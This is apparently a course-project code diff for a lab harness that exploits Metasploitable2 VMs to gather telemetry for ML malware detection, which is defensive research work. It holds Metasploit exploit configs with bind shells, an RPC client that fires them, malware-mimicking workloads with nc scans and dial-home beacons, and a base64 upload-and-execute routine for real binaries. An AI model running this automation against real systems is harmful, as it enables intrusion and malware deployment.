for p in sorted(directory.glob("*.toml"))
}
def select_module(
catalog: dict[str, ModuleConfig],
*,
host_id: str,
slot: int,
episode_index: int,
) -> ModuleConfig:
"""Deterministic per-(host, slot, ep) module selector. Mirrors
SampleManifest.select() so the entry vector rotates the same way
the post-infection workload does. Two hosts usually hash to different
modules at the same slot/episode (collision rate ~1/N for a catalog
of N modules). Selection is hash-based rather than round-robin, so a
single host is expected to cover the full catalog only after roughly
N*ln(N) episodes.
Inputs reduce to a SHA-256 keyed lookup so runs replay
bit-identically given the same (host, slot, ep) tuple and the same
set of catalog keys."""
if not catalog:
raise ValueError("module catalog is empty")
keys = sorted(catalog.keys())
seed = f"module|{host_id}|{slot}|{episode_index}".encode()
h = hashlib.sha256(seed).digest()
idx = int.from_bytes(h[:8], "big") % len(keys)
return catalog[keys[idx]]
def module_target_port(module: ModuleConfig) -> int | None:
"""Pull the RPORT off a module config. Used by the fleet runner
to wire the launcher's hostfwd to the right service inside the
target VM (vsftpd:21, samba:139, php-cgi:80, distccd:3632,
unrealircd:6667)."""
rport = module.options.get("RPORT")
if isinstance(rport, int):
return rport
if isinstance(rport, str) and rport.isdigit():
return int(rport)
return None
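
To make the replay property of the SHA-256 selector concrete, here is a stripped-down sketch that works on bare key lists instead of `ModuleConfig` objects. The function name `pick`, the host id and the catalog keys are illustrative assumptions; the seed format follows the selector above.

```python
import hashlib


def pick(keys: list[str], host_id: str, slot: int, episode_index: int) -> str:
    """SHA-256 keyed index into the sorted key list."""
    ordered = sorted(keys)
    seed = f"module|{host_id}|{slot}|{episode_index}".encode()
    digest = hashlib.sha256(seed).digest()
    return ordered[int.from_bytes(digest[:8], "big") % len(ordered)]


catalog = ["vsftpd_234_backdoor", "usermap_script", "distcc_exec"]

# Same tuple, different input order: sorting makes the choice order-independent.
first = pick(catalog, "lab-host-1", 0, 7)
again = pick(list(reversed(catalog)), "lab-host-1", 0, 7)

# Walk many episodes on one host to see which modules get exercised.
covered = {pick(catalog, "lab-host-1", 0, ep) for ep in range(200)}
print(first == again, sorted(covered))
```

Note that adding or removing a catalog entry changes `len(ordered)` and therefore reshuffles every selection, so replays are only stable for a fixed catalog.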


@ -0,0 +1,36 @@
description = """
distccd v1 unauthenticated command execution (CVE-2004-2687). The
distcc daemon doesn't verify the source of compile jobs, so a
crafted DCC_CMD-style request runs an arbitrary command as the
distccd user. Metasploitable2 ships distccd 2.18.3 listening on
3632. Returns a low-priv shell paired with a privesc later if
needed; for envelope work the unprivileged shell is enough.
"""
[module]
type = "exploit"
path = "unix/misc/distcc_exec"
[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 3632
[payload]
# Bind shell on a fixed in-guest port. The host hostfwds this port
# (see runtime.extra_target_ports) so msfrpcd can connect to it
# from the loopback side. Avoids the SLIRP+restrict=on dead-end the
# reverse_tcp payload hits.
path = "cmd/unix/bind_perl"
[payload.options]
LPORT = 4444
[session]
type = "shell"
[runtime]
# Reverse/bind callback path → needs the host-only bridge so the
# guest can reach the attacker (or the host can reach the bind port
# beyond SLIRP's restricted forward). Set BRIDGE=br-malware on the
# lab host to enable.
requires_bridge = true
extra_target_ports = [4444]


@ -0,0 +1,28 @@
description = """
PHP-CGI argument injection (CVE-2012-1823). PHP < 5.3.12 in CGI mode
treats query-string args as command-line flags, letting a crafted
?-d allow_url_include=1 turn any PHP page into a remote-code-exec.
Metasploitable2's Apache + php-cgi setup is vulnerable. Returns a
shell session on whoever runs Apache.
"""
[module]
type = "exploit"
path = "multi/http/php_cgi_arg_injection"
[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 80
TARGETURI = "/"
[payload]
path = "cmd/unix/bind_perl"
[payload.options]
LPORT = 4445
[session]
type = "shell"
[runtime]
requires_bridge = true
extra_target_ports = [4445]


@ -0,0 +1,21 @@
description = """
Samba 3.0.20 username-map command injection (CVE-2007-2447). Trigger
is a crafted username at SMB authentication; the Samba daemon shells
out via the username_map_script and runs whatever the attacker put in
the username. Standard Metasploitable2 vector. Returns a root shell
on the SMB socket, so it works with cmd/unix/interact.
"""
[module]
type = "exploit"
path = "multi/samba/usermap_script"
[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 139
[payload]
path = "cmd/unix/interact"
[session]
type = "shell"


@ -0,0 +1,28 @@
description = """
UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075). A modified release
shipped to the official mirrors carried a backdoor that runs an
arbitrary command on receipt of a magic AB; payload string. Once
the backdoor was discovered the official tarball was pulled, but
Metasploitable2 still ships the trojaned build. Returns a shell on
the IRC user.
"""
[module]
type = "exploit"
path = "unix/irc/unreal_ircd_3281_backdoor"
[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 6667
[payload]
path = "cmd/unix/bind_perl"
[payload.options]
LPORT = 4446
[session]
type = "shell"
[runtime]
requires_bridge = true
extra_target_ports = [4446]


@ -0,0 +1,23 @@
description = """
vsftpd 2.3.4 intentional backdoor (CVE-2011-2523). Triggered by an FTP
USER name ending with ':)'. Standard Metasploitable2 exploit, fully
deterministic, which makes it a good fit for a Tier-3 first-light run because the
exploit fire timing is bounded by a single FTP round-trip.
"""
[module]
type = "exploit"
path = "unix/ftp/vsftpd_234_backdoor"
[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 21
# The exploit returns its own command shell — we drive it with a
# minimal cmd/unix/interact payload so the session lands as a plain
# shell session usable by session.shell_write/read.
[payload]
path = "cmd/unix/interact"
[session]
type = "shell"

231
exploits/msfrpc.py Normal file

@ -0,0 +1,231 @@
"""Tiny Metasploit RPC client — just enough for the Tier-3 driver.
We talk msgpack over HTTPS to ``msfrpcd``. The full MSF RPC surface is
huge; this client implements only the verbs we actually call:
    auth.login                 get a token
    auth.logout                release the token
    module.execute             fire an exploit (or aux) module by name
    job.list / job.stop        manage the running module
    session.list               see opened sessions, find the one we just opened
    session.shell_write/read   run commands in a shell session
    session.stop               kill a session at episode end
Why not pull in pymetasploit3? Two reasons:
- msfrpcd's protocol is small enough that owning it removes a third-party
dep (and a maintenance risk on a course project).
- the parts we need (session opening, shell commands, job lifecycle)
are simple, and we want full visibility into what's on the wire when
debugging an exploit fire.
The client is intentionally synchronous; the Tier-3 driver runs in the
orchestrator's main thread alongside the collector, and a session-open
poll of a few hundred milliseconds is well within budget.
"""
from __future__ import annotations
import http.client
import logging
import socket
import ssl
import time
from dataclasses import dataclass
from typing import Any
try:
import msgpack # type: ignore[import-untyped]
except ImportError as e: # pragma: no cover - import-time guard
raise ImportError(
"the msgpack package is required for the MSF RPC client. "
"install it with: pip install msgpack"
) from e
log = logging.getLogger("cis490.msfrpc")
class MSFRpcError(RuntimeError):
"""Raised when msfrpcd returns an error or a malformed response."""
@dataclass
class MSFRpcConfig:
host: str = "127.0.0.1"
port: int = 55553
user: str = "msf"
password: str = ""
ssl: bool = True
timeout_s: float = 30.0
# msfrpcd's default cert is self-signed — most callers will run
# against localhost where this is the right tradeoff. Override
# explicitly for any non-loopback host.
verify: bool = False
class MSFRpcClient:
"""Synchronous msfrpcd client. Token is acquired on ``login()`` and
re-used on every subsequent call. Not thread-safe; the driver owns
one client per episode."""
def __init__(self, cfg: MSFRpcConfig) -> None:
self.cfg = cfg
self._token: str | None = None
# ---- session management --------------------------------------------
def login(self) -> None:
resp = self._call_no_auth("auth.login", self.cfg.user, self.cfg.password)
if resp.get("result") != "success" or "token" not in resp:
raise MSFRpcError(f"auth.login failed: {resp!r}")
self._token = resp["token"]
log.info("msfrpc auth.login ok (token=%s...)", self._token[:8])
def logout(self) -> None:
if self._token is None:
return
try:
self._call("auth.logout", self._token)
except MSFRpcError as e:
log.warning("msfrpc auth.logout: %s", e)
finally:
self._token = None
# ---- modules --------------------------------------------------------
def module_execute(
self,
module_type: str,
module_name: str,
options: dict[str, Any],
) -> dict[str, Any]:
"""Fire a module. Returns ``{"job_id": int, "uuid": str}``."""
resp = self._call("module.execute", module_type, module_name, options)
if "job_id" not in resp:
raise MSFRpcError(f"module.execute returned no job_id: {resp!r}")
log.info(
"module.execute %s/%s -> job_id=%s uuid=%s",
module_type, module_name, resp["job_id"], resp.get("uuid"),
)
return resp
# ---- jobs -----------------------------------------------------------
def job_list(self) -> dict[str, str]:
return self._call("job.list")
def job_stop(self, job_id: int | str) -> dict[str, Any]:
# msfrpcd accepts the id as a string.
return self._call("job.stop", str(job_id))
# ---- sessions -------------------------------------------------------
def session_list(self) -> dict[int, dict[str, Any]]:
raw = self._call("session.list")
# msfrpcd keys session ids as ints in msgpack but some versions
# round-trip them as strings. Normalize.
out: dict[int, dict[str, Any]] = {}
for k, v in (raw or {}).items():
try:
out[int(k)] = v
except (TypeError, ValueError):
pass
return out
def session_shell_write(self, session_id: int, data: str) -> dict[str, Any]:
if not data.endswith("\n"):
data = data + "\n"
return self._call("session.shell_write", session_id, data)
def session_shell_read(self, session_id: int) -> str:
resp = self._call("session.shell_read", session_id)
return resp.get("data", "") if isinstance(resp, dict) else ""
def session_stop(self, session_id: int) -> dict[str, Any]:
return self._call("session.stop", session_id)
# ---- transport ------------------------------------------------------
def _call(self, method: str, *args: Any) -> dict[str, Any]:
if self._token is None:
raise MSFRpcError("not authenticated; call login() first")
return self._raw_call([method, self._token, *args])
def _call_no_auth(self, method: str, *args: Any) -> dict[str, Any]:
return self._raw_call([method, *args])
def _raw_call(self, payload: list[Any]) -> dict[str, Any]:
body = msgpack.packb(payload, use_bin_type=False)
conn = self._open_conn()
try:
conn.request(
"POST",
"/api/",
body=body,
headers={
"Content-Type": "binary/message-pack",
"Content-Length": str(len(body)),
"Connection": "close",
},
)
r = conn.getresponse()
raw = r.read()
if r.status != 200:
raise MSFRpcError(
f"msfrpcd HTTP {r.status} for {payload[0]!r}: {raw[:200]!r}"
)
except (socket.error, http.client.HTTPException) as e:
raise MSFRpcError(f"transport error calling {payload[0]!r}: {e}") from e
finally:
conn.close()
try:
decoded = msgpack.unpackb(raw, raw=False)
except Exception as e:
raise MSFRpcError(f"could not decode msfrpcd response: {e}") from e
if isinstance(decoded, dict) and decoded.get("error") is True:
raise MSFRpcError(
f"{payload[0]!r}: {decoded.get('error_class')} "
f"{decoded.get('error_message')}"
)
if not isinstance(decoded, dict):
# session.list and friends can legitimately return {} or a dict,
# but never a non-dict — anything else is a protocol violation.
raise MSFRpcError(
f"unexpected response type for {payload[0]!r}: {type(decoded).__name__}"
)
return decoded
def _open_conn(self) -> http.client.HTTPConnection:
if self.cfg.ssl:
ctx = ssl.create_default_context()
if not self.cfg.verify:
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
return http.client.HTTPSConnection(
self.cfg.host, self.cfg.port,
timeout=self.cfg.timeout_s, context=ctx,
)
return http.client.HTTPConnection(
self.cfg.host, self.cfg.port, timeout=self.cfg.timeout_s,
)
def wait_for_new_session(
client: MSFRpcClient,
*,
seen: set[int],
timeout_s: float,
poll_s: float = 0.25,
) -> tuple[int, dict[str, Any]] | None:
"""Poll ``session.list`` until a session id we haven't seen before
appears, or until timeout. Returns ``(session_id, info)`` or None."""
deadline = time.monotonic() + timeout_s
while time.monotonic() < deadline:
sessions = client.session_list()
for sid, info in sessions.items():
if sid not in seen:
return sid, info
time.sleep(poll_s)
return None
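
The polling helper above is easiest to follow with a stand-in client. The sketch below is an illustration only: `FakeClient` is a hypothetical substitute for `MSFRpcClient` (so nothing here talks to msfrpcd), and the loop is restated from the diff so the block runs on its own. It shows the intended call pattern: snapshot the session ids that already exist, then poll until a new id appears or the timeout expires.

```python
import time
from typing import Any


class FakeClient:
    """Hypothetical stand-in for MSFRpcClient: a new session appears on the third poll."""

    def __init__(self) -> None:
        self.polls = 0

    def session_list(self) -> dict[int, dict[str, Any]]:
        self.polls += 1
        sessions: dict[int, dict[str, Any]] = {1: {"type": "shell"}}
        if self.polls >= 3:
            sessions[2] = {"type": "shell", "via_exploit": "hypothetical/module"}
        return sessions


def wait_for_new_session(client, *, seen, timeout_s, poll_s=0.25):
    # Same polling loop as in the diff, restated so the sketch is self-contained.
    deadline = time.monotonic() + timeout_s
    while time.monotonic() < deadline:
        for sid, info in client.session_list().items():
            if sid not in seen:
                return sid, info
        time.sleep(poll_s)
    return None


client = FakeClient()
seen = set(client.session_list())  # ids present before the exploit fires
found = wait_for_new_session(client, seen=seen, timeout_s=2.0, poll_s=0.01)
# A client that never produces an unseen id runs into the timeout instead.
missed = wait_for_new_session(FakeClient(), seen={1, 2}, timeout_s=0.05, poll_s=0.01)
```

Taking the `seen` snapshot before firing the exploit matters: a session that was already open would otherwise be mistaken for the one the exploit just landed.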

346
exploits/workloads.py Normal file

@ -0,0 +1,346 @@
"""Per-sample-profile post-exploit workloads (driver v2).
The Tier-3 driver lands a session and then needs to drive *something*
in that session for the ``infected_running`` phase. Driver v1 ran
``yes > /dev/null`` for every sample, which is fine for proving the
pipe but is the wrong shape for ML: every Tier-3 episode produces
the same envelope regardless of which malware family we said it was.
Driver v2 maps ``sample.profile`` from the manifest to a distinct
in-session workload so each profile's envelope is observably
different on every collector:
cpu-saturate 1-vCPU saturation, very low IO/net (XMRig shape)
scan-and-dial SYN scans across the bridge IP space + periodic
dial-home (Mirai shape)
io-walk fs traversal + random write spikes (ransomware shape)
bursty-c2 long idle, periodic short TCP egress bursts (Dridex)
low-and-slow minimal CPU, periodic memory churn (Kovter)
shell-resident one long-lived TCP socket pinned to a bridge IP,
occasional small command bursts (RAT)
Each profile returns a small shell command that backgrounds a loop
inside the session. The driver can stop them by killing the loop's
PID file or via a profile-specific kill command.
This module is intentionally *behaviorally diverse but harmless*:
it does NOT execute real malware. Real binaries land via the Tier-4
fetch+run path (separate work). What this gives us today is six
distinguishable in-guest envelopes the ML model can learn to
discriminate between *and* fall back to when a real sample isn't yet
staged.
"""
from __future__ import annotations
import logging
from dataclasses import dataclass
from samples.manifest import Sample
log = logging.getLogger("cis490.exploits.workloads")
@dataclass(frozen=True)
class Workload:
"""A pair of shell commands executable in a Metasploit shell session.
``start_cmd`` backgrounds a loop and writes its PID to ``pid_path``.
``stop_cmd`` kills the loop using that PID file. Both commands are
expected to be POSIX-shell compatible and to leave the session in
a usable state on completion (return code 0 on the prompt)."""
profile: str
start_cmd: str
stop_cmd: str
description: str
@property
def pid_path(self) -> str:
return f"/tmp/.cis490-workload-{self.profile}.pid"
def _wrap_loop(name: str, body: str) -> Workload:
"""Common pattern: write a small wrapper script that loops ``body``,
background it, and stash the wrapper's PID. Stop kills that PID +
its child group."""
pid_path = f"/tmp/.cis490-workload-{name}.pid"
script_path = f"/tmp/.cis490-workload-{name}.sh"
# Write the body through a heredoc with a quoted delimiter so that
# ``$``, backticks, and quotes inside the body reach the script verbatim.
start = (
f"cat > {script_path} <<'CIS490_EOF'\n"
f"#!/bin/sh\n"
f"trap 'exit 0' TERM INT\n"
f"while :; do\n"
f"{body}\n"
f"done\n"
f"CIS490_EOF\n"
f"chmod +x {script_path}; "
f"nohup sh {script_path} </dev/null >/dev/null 2>&1 &\n"
f"echo $! > {pid_path}\n"
# disown is a bash builtin; tolerate its absence on dash / busybox ash.
f"disown 2>/dev/null || true\n"
)
stop = (
f"if [ -f {pid_path} ]; then "
f" kill -- -$(cat {pid_path}) 2>/dev/null; "
f" kill $(cat {pid_path}) 2>/dev/null; "
f" rm -f {pid_path} {script_path}; "
f"fi; true\n"
)
return Workload(profile=name, start_cmd=start, stop_cmd=stop,
description="(generated)")
# ---------------------------------------------------------------------------
# Profile factories — each returns a Workload tuned to that family
# ---------------------------------------------------------------------------
def _cpu_saturate() -> Workload:
"""XMRig-class — sustained single-vCPU saturation, no IO, no net."""
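# Kill the backgrounded ``yes`` from the TERM trap; otherwise stopping the
# wrapper by PID orphans it when the session shell runs without job control.
body = (
" yes > /dev/null 2>&1 &\n"
" child=$!\n"
" trap 'kill $child 2>/dev/null; exit 0' TERM INT\n"
" wait $child\n"
)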
w = _wrap_loop("cpu-saturate", body)
return Workload(
profile="cpu-saturate",
start_cmd=w.start_cmd,
stop_cmd=w.stop_cmd,
description="100% CPU on 1 vCPU; no IO, no net",
)
def _scan_and_dial() -> Workload:
"""Mirai-class — TCP SYN-style probe of bridge subnet + occasional
"dial home" to the gateway. Heavy net, moderate CPU.
Uses ``nc`` (netcat) instead of bash's /dev/tcp redirects — the
latter is bash-only and silently no-ops on busybox / dash, which
is what Metasploitable2 and Alpine guest sessions actually run.
No fallback is implemented: if ``nc`` is missing, the probes fail silently."""
body = (
" for i in 1 2 3 4 5 6 7 8 9 10; do\n"
" nc -z -w 1 10.200.0.$((i+1)) 23 >/dev/null 2>&1 &\n"
" nc -z -w 1 10.200.0.$((i+1)) 2323 >/dev/null 2>&1 &\n"
" done\n"
" wait\n"
" echo dial-home | nc -w 1 10.200.0.1 4444 >/dev/null 2>&1\n"
" sleep 2\n"
)
w = _wrap_loop("scan-and-dial", body)
return Workload(
profile="scan-and-dial",
start_cmd=w.start_cmd,
stop_cmd=w.stop_cmd,
description="Periodic SYN-style scan across bridge IPs + dial-home",
)
def _io_walk() -> Workload:
"""Cryptolocker-class — fs traversal + write spikes. Heavy disk."""
body = (
" mkdir -p /tmp/.cis490-victim\n"
" for n in 1 2 3 4 5 6 7 8; do\n"
" dd if=/dev/urandom of=/tmp/.cis490-victim/f$n bs=4k count=64 2>/dev/null\n"
" done\n"
" for f in /tmp/.cis490-victim/*; do cat $f > /dev/null; done\n"
" sleep 1\n"
)
w = _wrap_loop("io-walk", body)
return Workload(
profile="io-walk",
start_cmd=w.start_cmd,
stop_cmd=w.stop_cmd,
description="FS traversal + random-data writes, periodic re-read",
)
def _bursty_c2() -> Workload:
"""Dridex-class — long idle, periodic small TCP burst to a fixed
peer (the bridge gateway). nc-based for busybox compatibility."""
body = (
" sleep 25\n"
" for i in 1 2 3; do\n"
" echo c2-beacon-$$-$i | nc -w 1 10.200.0.1 4445 >/dev/null 2>&1\n"
" sleep 1\n"
" done\n"
)
w = _wrap_loop("bursty-c2", body)
return Workload(
profile="bursty-c2",
start_cmd=w.start_cmd,
stop_cmd=w.stop_cmd,
description="Long idle + periodic 3-connection egress burst to gateway",
)
def _low_and_slow() -> Workload:
"""Kovter-class — low CPU, periodic memory churn, no on-disk
artifact. The hardest envelope to label from /proc alone."""
body = (
" sleep 8\n"
" awk 'BEGIN { for(i=0;i<200000;i++) a[i]=i*i; }' >/dev/null 2>&1\n"
" sleep 4\n"
)
w = _wrap_loop("low-and-slow", body)
return Workload(
profile="low-and-slow",
start_cmd=w.start_cmd,
stop_cmd=w.stop_cmd,
description="Periodic memory churn (~200k array allocs) on a slow cycle",
)
def _shell_resident() -> Workload:
"""RAT-style — keep a single TCP connection open to the gateway
with occasional command bursts. Long-lived flow, small bytes.
Uses ``nc -w`` on the busybox-compatible path. We pipe a slow
feed into nc so the connection stays open for ~30 s before the
-w idle timeout closes it, matching the long-lived-flow shape.
Then we sleep + reconnect, producing the periodic-tick pattern."""
body = (
" ( for i in 1 2 3 4 5 6; do\n"
" echo cmd-tick-$i\n"
" sleep 5\n"
" done ) | nc -w 30 10.200.0.1 4446 >/dev/null 2>&1\n"
" sleep 5\n"
)
w = _wrap_loop("shell-resident", body)
return Workload(
profile="shell-resident",
start_cmd=w.start_cmd,
stop_cmd=w.stop_cmd,
description="Resident TCP connection to gateway with periodic ticks",
)
_FACTORIES = {
"cpu-saturate": _cpu_saturate,
"scan-and-dial": _scan_and_dial,
"io-walk": _io_walk,
"bursty-c2": _bursty_c2,
"low-and-slow": _low_and_slow,
"shell-resident": _shell_resident,
}
def workload_for(sample: Sample | None) -> Workload | None:
"""Return the Workload matching ``sample.profile``, or None when
no sample is supplied (driver v1 fallback path)."""
if sample is None:
return None
factory = _FACTORIES.get(sample.profile)
if factory is None:
log.warning("no workload profile for %r; falling back to cpu-saturate", sample.profile)
return _cpu_saturate()
return factory()
def all_profiles() -> list[str]:
return sorted(_FACTORIES.keys())
# ---------------------------------------------------------------------------
# Tier-4 path: real-binary upload + execute inside the shell session
# ---------------------------------------------------------------------------
@dataclass(frozen=True)
class ChunkedUpload:
"""Multi-step upload plan. Each chunk is one ``shell_write`` call;
the driver issues them in order, then a final integrity check, then
the exec command. The last command runs the binary and writes its
PID to ``pid_path``."""
profile: str
chunks: tuple[str, ...] # each is a complete shell command
finalize_cmd: str # decode + verify sha256 + chmod
exec_cmd: str # actually launch the binary
stop_cmd: str
bin_path: str
pid_path: str
expected_sha256: str
n_chunks: int
# Conservative chunk size: msfrpc shell_write payloads are reliable
# under ~16 KiB (single TCP write inside the framework). Use 8 KiB of
# *base64* (which is 6 KiB of binary) per chunk so we leave room for
# the wrapper and stay well under the limit.
_CHUNK_B64_BYTES = 8 * 1024
def chunked_real_binary_upload(
binary_bytes: bytes,
sample: Sample | None = None,
) -> ChunkedUpload:
"""Plan a chunked upload of ``binary_bytes`` into a shell session.
First chunk creates an empty file; subsequent chunks append a
base64 segment. ``finalize_cmd`` decodes + sha256-verifies the
result; ``exec_cmd`` launches the binary and stashes its PID.
The driver issues these as separate shell_writes so we never
push more than ~10 KiB through msfrpc in a single call."""
import base64 as _b64
import hashlib as _hashlib
profile = (sample.profile if sample else "real-binary")
pid_path = f"/tmp/.cis490-real-{profile}.pid"
bin_path = f"/tmp/.cis490-real-{profile}.bin"
b64_path = f"/tmp/.cis490-real-{profile}.b64"
sha = _hashlib.sha256(binary_bytes).hexdigest()
encoded = _b64.b64encode(binary_bytes).decode("ascii")
chunks: list[str] = []
chunks.append(f"mkdir -p /tmp; : > {b64_path}; echo upload-begin")
for i in range(0, len(encoded), _CHUNK_B64_BYTES):
seg = encoded[i:i + _CHUNK_B64_BYTES]
# printf '%s' avoids interpreting '%' / '\\' inside the b64 chars.
chunks.append(f"printf '%s' '{seg}' >> {b64_path}")
finalize = (
f"base64 -d {b64_path} > {bin_path} && rm -f {b64_path} && "
f"chmod +x {bin_path} && "
f"GOT=$(sha256sum {bin_path} | awk '{{print $1}}') && "
f"if [ \"$GOT\" = \"{sha}\" ]; then echo sha-ok; "
f"else echo sha-mismatch:$GOT; rm -f {bin_path}; false; fi"
)
exec_cmd = (
f"nohup {bin_path} </dev/null >/dev/null 2>&1 & "
# disown is a bash builtin; tolerate its absence on dash / busybox ash.
f"echo $! > {pid_path}; disown 2>/dev/null || true; echo exec-ok"
)
stop = (
f"if [ -f {pid_path} ]; then "
f" kill -- -$(cat {pid_path}) 2>/dev/null; "
f" kill $(cat {pid_path}) 2>/dev/null; "
f" rm -f {pid_path} {bin_path}; "
f"fi; true"
)
return ChunkedUpload(
profile=f"real:{profile}",
chunks=tuple(chunks),
finalize_cmd=finalize,
exec_cmd=exec_cmd,
stop_cmd=stop,
bin_path=bin_path,
pid_path=pid_path,
expected_sha256=sha,
n_chunks=len(chunks),
)
def real_binary_workload(binary_bytes: bytes, sample: Sample | None = None) -> Workload:
"""Backwards-compat wrapper that produces a single-shot Workload
by concatenating a chunked plan into one start_cmd. Kept for
callers that drive the v1 single-shell-write flow (e.g. tests).
Production path: the driver should call ``chunked_real_binary_upload``
and walk the chunks itself so msfrpc never sees a buffer-busting
payload."""
plan = chunked_real_binary_upload(binary_bytes, sample=sample)
start = "\n".join(list(plan.chunks) + [plan.finalize_cmd, plan.exec_cmd]) + "\n"
return Workload(
profile=plan.profile,
start_cmd=start,
stop_cmd=plan.stop_cmd,
description=f"Real binary upload+execute ({len(binary_bytes)} bytes, {plan.n_chunks} chunks)",
)
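
The chunking arithmetic in `chunked_real_binary_upload` can be checked without a shell session. The following is a minimal sketch under stated assumptions: `plan_chunks` and `reassemble` are hypothetical helper names (not part of the module), and `reassemble` stands in for the guest-side `base64 -d` step. It shows that fixed-size slices of the base64 text decode back to the original bytes once concatenated, and that the sha256 comparison used by `finalize_cmd` would pass.

```python
import base64
import hashlib

CHUNK_B64_BYTES = 8 * 1024  # mirrors _CHUNK_B64_BYTES in the diff


def plan_chunks(binary: bytes, chunk: int = CHUNK_B64_BYTES) -> list[str]:
    """Split the base64 text of ``binary`` into fixed-size segments."""
    encoded = base64.b64encode(binary).decode("ascii")
    return [encoded[i:i + chunk] for i in range(0, len(encoded), chunk)]


def reassemble(segments: list[str]) -> bytes:
    """Stand-in for the guest-side ``base64 -d`` after every append has landed."""
    return base64.b64decode("".join(segments))


payload = bytes(range(256)) * 100  # 25,600 bytes of stand-in data, not a real sample
segments = plan_chunks(payload)
restored = reassemble(segments)
sha_ok = hashlib.sha256(restored).hexdigest() == hashlib.sha256(payload).hexdigest()
```

Because the segments are only decoded after concatenation, the slice boundaries do not need to respect base64's 4-character groups; the 8 KiB size simply keeps each `shell_write` small.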

View file

@ -36,7 +36,8 @@ from datetime import datetime, timezone
from pathlib import Path
from typing import Callable
from collectors import proc_qemu
from collectors import guest_agent, pcap, perf_qemu, proc_qemu, qmp
from samples.manifest import Sample
from .ulid import new_ulid
@ -61,6 +62,38 @@ class EpisodeConfig:
# When set, walk this schedule and ignore duration_s for sleep timing.
# ``duration_s`` still goes in meta.schedule for record-keeping.
phase_schedule: PhaseSchedule | None = None
# Optional: paths to QEMU sockets exposed by the launcher. When
# set, EpisodeRunner spins up additional collector threads.
qmp_socket: Path | None = None
qmp_interval_ms: int = 1000 # QMP queries are heavier than /proc reads
guest_agent_socket: Path | None = None
# Optional: bridge interface to capture per-episode pcap on. When
# set, EpisodeRunner spawns tcpdump for the duration of the
# schedule and bucketizes the result into netflow.jsonl on stop.
bridge_iface: str | None = None
bridge_ip: str = "10.200.0.1"
pcap_snaplen: int = 256
# Source 3: perf stat sampling. Disabled by default because perf
# needs CAP_SYS_ADMIN or perf_event_paranoid <= 1; enable
# explicitly per-episode when the host supports it.
enable_perf: bool = False
perf_interval_ms: int = 100
# The Sample that drove this episode's workload selection. Stamped
# into meta.json so trainers can join episodes by family / kind
# without re-deriving from events. None = v1 yes-loop fallback.
sample: Sample | None = None
# The exploit module that fired (Tier 3+). Plain dict so the runner
# doesn't need to import exploits.modules; populated by callers
# that have a ModuleConfig in hand.
exploit_meta: dict | None = None
# Snapshot/revert (Tier 0+):
# revert_at_start — before any phase walks, loadvm <snapshot_name>.
# Use this to drop the guest back to a known-good baseline at
# the start of every episode in a long-lived-VM fleet loop.
# revert_at_end — after the schedule walks, loadvm <snapshot_name>
# so the next consumer of this VM starts clean too.
revert_at_start: bool = False
revert_at_end: bool = False
@dataclass
@ -68,8 +101,13 @@ class EpisodeResult:
episode_id: str
episode_dir: Path
rows_proc: int
pid_disappeared: bool
duration_observed_s: float
rows_qmp: int = 0
rows_guest: int = 0
rows_netflow: int = 0
rows_perf: int = 0
pcap_bytes: int = 0
pid_disappeared: bool = False
duration_observed_s: float = 0.0
phases_observed: list[str] = field(default_factory=list)
@ -83,25 +121,73 @@ class EpisodeRunner:
self.on_phase = on_phase
self.episode_id = cfg.episode_id or new_ulid()
self.episode_dir: Path = cfg.data_root / "episodes" / self.episode_id
# Create the dir up front so external drivers can call
# emit_event() between construction and run() — e.g. an exploit
# driver that writes a driver_setup event before the schedule
# walks. The dir is otherwise empty until run() opens files.
self.episode_dir.mkdir(parents=True, exist_ok=True)
self._t_mono_origin_ns: int = 0
self._stop = threading.Event()
# ---- public ---------------------------------------------------------
def run(self) -> EpisodeResult:
self.episode_dir.mkdir(parents=True, exist_ok=True)
self._t_mono_origin_ns = time.monotonic_ns()
started_at_wall = datetime.now(timezone.utc).isoformat()
# snapshot_load is the marker for "episode clock = 0". Emit
# BEFORE any file I/O — _write_meta() takes >1 ms on slow disks
# (Refs spectral/CIS490#7).
self.emit_event("snapshot_load", snapshot=self.cfg.snapshot_name)
started_at_wall = datetime.now(timezone.utc).isoformat()
meta = self._initial_meta(started_at_wall)
self._write_meta(meta)
self._emit_event(0, "snapshot_load", snapshot=self.cfg.snapshot_name)
# Snapshot revert at start: pause+restore the guest to a known
# baseline before phase 0. Requires QMP and a savevm having
# already taken place (the launcher is responsible for that).
if self.cfg.revert_at_start and self.cfg.qmp_socket is not None:
try:
client = qmp.QMPClient(self.cfg.qmp_socket)
client.connect()
try:
out = client.loadvm(self.cfg.snapshot_name)
self.emit_event(
"snapshot_revert",
when="start",
snapshot=self.cfg.snapshot_name,
output=(out or "").strip()[:256],
)
finally:
client.close()
except Exception as e:
log.warning("loadvm at start failed: %s", e)
self.emit_event(
"snapshot_revert_failed",
when="start",
snapshot=self.cfg.snapshot_name,
error=str(e),
)
rows_holder: dict[str, int] = {"rows": 0}
rows_holder: dict[str, int] = {"proc": 0, "qmp": 0, "guest": 0, "netflow": 0, "perf": 0}
pcap_handle: pcap.CaptureHandle | None = None
pcap_path = self.episode_dir / "network.pcap"
netflow_path = self.episode_dir / "netflow.jsonl"
if self.cfg.bridge_iface:
try:
pcap_handle = pcap.run_capture(
bridge=self.cfg.bridge_iface,
pcap_path=pcap_path,
snaplen=self.cfg.pcap_snaplen,
)
self.emit_event("pcap_started", iface=self.cfg.bridge_iface)
except (OSError, FileNotFoundError) as e:
log.warning("pcap capture not available on %s: %s",
self.cfg.bridge_iface, e)
self.emit_event("pcap_unavailable",
iface=self.cfg.bridge_iface, error=str(e))
def _collector() -> None:
rows_holder["rows"] = proc_qemu.run_loop(
def _proc_collector() -> None:
rows_holder["proc"] = proc_qemu.run_loop(
pid=self.cfg.target_pid,
output_path=self.episode_dir / "telemetry-proc.jsonl",
t_mono_origin_ns=self._t_mono_origin_ns,
@ -109,8 +195,44 @@ class EpisodeRunner:
stop_event=self._stop,
)
t = threading.Thread(target=_collector, daemon=True, name="proc_qemu")
t.start()
def _qmp_collector() -> None:
assert self.cfg.qmp_socket is not None
rows_holder["qmp"] = qmp.run_loop(
socket_path=self.cfg.qmp_socket,
output_path=self.episode_dir / "telemetry-qmp.jsonl",
t_mono_origin_ns=self._t_mono_origin_ns,
interval_ms=self.cfg.qmp_interval_ms,
